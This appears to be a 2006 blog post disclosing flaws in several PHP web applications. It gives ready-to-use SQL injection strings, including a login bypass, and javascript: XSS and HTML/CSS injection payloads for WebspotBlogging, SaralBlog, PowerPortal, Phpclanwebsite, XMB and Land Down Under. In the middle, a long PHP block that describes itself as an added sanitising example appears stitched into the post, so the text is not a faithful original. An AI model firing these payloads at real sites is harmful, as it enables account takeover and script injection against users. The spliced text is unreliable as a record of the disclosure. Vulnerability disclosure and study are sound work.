ecoestadistica.com

Wednesday, January 18, 2006

Vulnerabilities...

WebspotBlogging Authentication Bypass

Link: http://host/webspot/login.php
Username: aaaa' union select 1,2,3,1,1,6, 7/*
Password: (any value)

--------------------------------------------------------------

SaralBlog XSS & Multiple SQL Injection

1. SQL Injection Example:
http://host/viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7/*


2. SQL Injection Example (magic_quotes_gpc: off):

Search:
aaaaa') union select 1,2,3,4,5,6/*


3. Cross-Site Scripting

Add a new comment:
Website: javascript:alert(123

--------------------------------------------------------------

PowerPortal XSS

XSS vulnerability:
http://www.example.com/modules/content/search.php?func=results&search=[XSS]
http://www.example.com/modules/content/search.php?search=[XSS]&func=results
http://www.example.com/modules/links/index.php?search=[XSS]&func=search_results

--------------------------------------------------------------

Phpclanwebsite BBCode IMG Tag XSS

img]javascript:alert('XSS')[/img

--------------------------------------------------------------

XMB Forum HTML Code Injection

Post this code:
img src=javascript:alert('XSS')
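
The SaralBlog Website field, the Phpclanwebsite [img] tag and the XMB post above share one root cause: a user-supplied URL reaches an HTML attribute without a scheme check. The PHP below is an added example of the corresponding fix, not code from this post or from any of the affected projects; the function names safe_user_url and render_bbcode_img and the sample inputs are constructed for illustration.

```php
<?php
// Added example (hypothetical helper names): allowlist URL schemes before
// a user-supplied URL is written into an href or src attribute.

/** Return the URL if it is an absolute http(s) URL, otherwise null. */
function safe_user_url(string $raw): ?string
{
    $url = trim($raw);
    // Allowlist, not blocklist: only absolute http:// or https:// passes,
    // and no whitespace, quotes or angle brackets are accepted in the URL.
    if (!preg_match('#^https?://[^\s"\'<>]+$#i', $url)) {
        return null;
    }
    return $url;
}

/** Render [img]...[/img] as <img> only when the URL passes the allowlist. */
function render_bbcode_img(string $text): string
{
    // Escape the whole post first so no raw HTML from the user survives.
    $escaped = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');

    return preg_replace_callback(
        '#\[img\](.*?)\[/img\]#is',
        function (array $m): string {
            // Decode the captured part to validate what the user really sent.
            $url = safe_user_url(htmlspecialchars_decode($m[1], ENT_QUOTES));
            if ($url === null) {
                return $m[0]; // rejected: leave the tag as inert, escaped text
            }
            $src = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
            return '<img src="' . $src . '" alt="">';
        },
        $escaped
    );
}

// Constructed sample inputs: the payload listed above and a benign image URL.
$samples = [
    "[img]javascript:alert('XSS')[/img]",
    "[img]https://example.com/a.png[/img]",
    "<img src=javascript:alert('XSS')>",
];
foreach ($samples as $s) {
    echo render_bbcode_img($s), PHP_EOL;
}
// A profile "Website" value goes through the same check before being linked.
var_dump(safe_user_url("javascript:alert(123)")); // NULL
```

Only the second sample produces an `<img>` element; the other two are emitted as escaped text.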

--------------------------------------------------------------

Land Down Under Signature HTML Code Injection

Example:
STYLE =text/css>BODY { background-image: url('http://www.geocities.com/night_warrior771/blank.jpeg'); }/STYLE

--------------------------------------------------------------

Vulnerabilities discovered by night_warrior771
night_warrior771[at]hotmail.com

Regards